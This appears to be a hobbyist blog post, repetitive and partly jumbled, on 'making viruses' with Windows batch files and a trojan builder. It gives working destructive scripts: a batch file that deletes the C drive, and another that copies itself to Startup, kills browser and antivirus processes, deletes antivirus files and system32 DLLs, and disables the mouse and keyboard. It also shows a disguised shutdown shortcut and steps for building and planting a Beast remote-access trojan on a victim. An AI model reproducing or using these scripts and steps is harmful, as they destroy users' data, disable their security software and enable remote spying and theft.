WAY 1:-
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
WAY 1:-
Step 1: Open note pad
OK first thing your going to need to do is open you're notepad
after you have open it you will need to take down the code in the next step
after you have open it you will need to take down the code in the next step
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Step 2: The code
the code
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo virus downloaded
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo downloading virus
goto hack
@echo off
echo virus downloaded
goto hack
Step 3: The code broken down into sections so that you can understand
@echo off
echo virus downloaded
goto hack
@echo off = this must be at the beginning of every command if it is not there it will look very bad when compleet
:hack= this is just a name for a command it can be changed for example :virus but : must always be at the begining of it
echo = this I what you want your command to say for example ECHO HII HOW ARE YOU TOODAY for this to work you need to
put echo in front of it otherwise it will come up as system error
goto hack = know we are going back to :hack or :virus this will basically repeat evry comand after :hack or :virus
if you changed :HACK to :VIRUS you will need to type GOTO VIRUS example below
@echo off
echo virus downloaded
goto virus
echo virus downloaded
goto hack
@echo off = this must be at the beginning of every command if it is not there it will look very bad when compleet
:hack= this is just a name for a command it can be changed for example :virus but : must always be at the begining of it
echo = this I what you want your command to say for example ECHO HII HOW ARE YOU TOODAY for this to work you need to
put echo in front of it otherwise it will come up as system error
goto hack = know we are going back to :hack or :virus this will basically repeat evry comand after :hack or :virus
if you changed :HACK to :VIRUS you will need to type GOTO VIRUS example below
@echo off
echo virus downloaded
goto virus
Step 4: Saving the fake virus
next we need to save it you might already know how to save it as a batch file but for those who don't here we go
.bat converts a word document into a command
.bat converts a word document into a command
WAY 2:-
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
This isn't really a virus ... its simply a shutdown program which will make your friends freak out.
First, you will need to create a shortcut. You can create a shortcut by right-clicking on your desktop and selecting New, and then, Shortcut.
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A Create Shortcut box should then open. In that box, write the following:
shutdown -s -t 30 -c "VIRUS DETECTED!!"
(note: the number 30 can be replaced by any other number. That number corresponds to the number of seconds before the computer will shutdown. Here I have chosen 30 in order to have enough time to close it before my computer shuts down. Also, the message between quotes can be replaced by something like "YOU HAVE BEEN INFECTED BY A TROJAN VIRUS" or some other great idea. However, the message must be between quotes.)
After, simply click on Next and a box with the name Shutdown will appear. Change the name that you want for it. In this case I have chosen Internet Explorer but it can always be renamed how you prefer.
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After naming it, click on Finish and ... here's your shutdown virus!!!! Not very convincing he? Well, in that case let's change our icon!
Right-click on your shutdown Internet Explorer icon (or whichever name you gave it) and select Properties.
Select Change Icon
(Note: A box saying "system 32 does not have any icons choose from a diffrent list" or something like that may pop-up; if it does simply click on Ok)
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Now... it depends on what you have named your shutdown virus ... If you chose Internet Explorer scroll all the way to the right and you will find the icon. If you did not choose Internet Explorer feel free to choose a different icon... Remember it has to be something that people will click on.
Now Heres our Icon ... Now it looks like something that people will click on.
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To close the program, select the start menu and click on Run...
Write: Shutdown -a
and the program should shutdown immediately.
(Note: To shut it, you can also do a new shortcut but instead of writing shutdown -s -t 30 -c "VIRUS DETECTED" write this: shutdown -a
and call it Shutdown abort..So instead of closing it with Run you can just click on your shutdown abort shortcut.)
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Have fun freaking out your friends/family ... And dont forget to close it or put a longer time frame so that you will have enough time to close it.
WARNING: This program will really shutdown your computer. It may be fun to do it to little sisters or friends but refrain from using it if someone is actually working on the computer, since they will lose all their information.
WAY 4:-
You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus. Open the notepad file and paste the following code:
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable
Save it as “virus.bat” or anything with the name you want to. Now your first virus is ready to work. You can also convert it as .exe file. It copies itself to startup, hard disk, my documents and then it kills explorer.exe, chrome.exe and firefox.exe. It tries to delete mcafee antivirus and tries to delete every .dll and .bat files. Now if someone clicks on the .bat or .exe file this batch file will run and execute the operations written in the code. So beware of running this batch file or you may need for a restoration on your computer. Read more about what is a computer virus, types of computer virus.
WAY 5:-
Because this software is very controversial, I would not be able to show all the images with respect to the Trojan Building Software.
PS: All the information provided above is for educational purpose, please don't try this for any criminal activity because if caught can even go to jail .
MANY of you might think that you are not stupid enough to click on a very small file as above, but guess if a picture or a software or a video or document imagine any file is INFECTED then what do you do...???
In the NEXT POST we will talk about how to make IMAGE, SOFTWARE, DOCUMENT, VIDEO, etc a INFECTED VIRUS.
WAY 5:-
How to Make your own TROJAN VIRUS
I guess everyone of you have once in your computer-life experienced a threat to your system called Virus. Now today we will see how a virus is made and which is the most highly and widely used by script kiddies. Before I start the recipe, we need to talk about few types of TROJAN VIRUS attacks;
well for those who do not know about TROJAN virus (please click to know what Trojan virus is) TROJAN VIRUS. First let us talk about the types of Trojan Attacks:
- Password Capturing and Sending,
- FTP (port:21) Trojan
- DOS Trojan (misuse of one's bandwidth)
- Remote Acces
- Software killer
Above we talked how do Trojans affect you. now we have; where do Trojan/Viruses come from,
- Online Chat/Group Chat (Yahoo,Gmail,IRC)
- Attached File in email
- Physical Access to a System
- Free Websites material/software
- Wrappers
- File Sharing
Softwares which create are (ones which still function):
The Software which I will Demonstrate in front of you is BEAST TROJAN HORSE, (ps: it is difficult to find these days but it's still very effective).
This is how the Software looks when you open it,
- Now what do hackers do is that they run this software (very small software), They first need the ip address of the victim they need to attack. Lets say they got your ip xxx.xxx.xxx.xxx they will enter it into the blue box just below HOST. (The address given is the default address common to all offline computers)
- Next is they require the port through which they need to attack, most of the script kiddies leave it default 6666 or 9999. But if hackers know what they are doing so they try to inject and communicate through the port they think will be vulnerable.
- next they click on build server and the window below will open, Most of the script kiddies do not mess with much of the settings,
if it is required to make the virus a little less detectable they change the name to something the user will not be able to recognize, such as the name given above.
4. Now before completion to make virus further undetectable they need go to EXE icon and choose a different icon then application, to just click on BUILD SERVER, an waalaah their virus TROJAN is created.
5. Now when they again look into the folder where beast is stored they find a file named as SERVER.EXE.(33kb to 66kb) this is the TROJAN virus.
6. Now the only thing left is to plant this virus into the system of the victim by any of the other means above. and the Victim is hacked.
When we go up and look at the first picture will will find a few options on the right hand side of the screen, using those options one can do following actions;
- Access ALL DRIVES of the victim and use it for exploitation or criminal activity,
- Use the person's WebCam
- Can ADD, Plant or even DELETE user softwares and DATA
- There are fun tricks also such as open CD drive, Lock Mouse, Lock Screen, Send Chat MEssages to the Victim
- Prompt Error Messages to the Victim etc., and many more activities which will surely make the user go pale.
PS: All the information provided above is for educational purpose, please don't try this for any criminal activity because if caught can even go to jail .
MANY of you might think that you are not stupid enough to click on a very small file as above, but guess if a picture or a software or a video or document imagine any file is INFECTED then what do you do...???
In the NEXT POST we will talk about how to make IMAGE, SOFTWARE, DOCUMENT, VIDEO, etc a INFECTED VIRUS.
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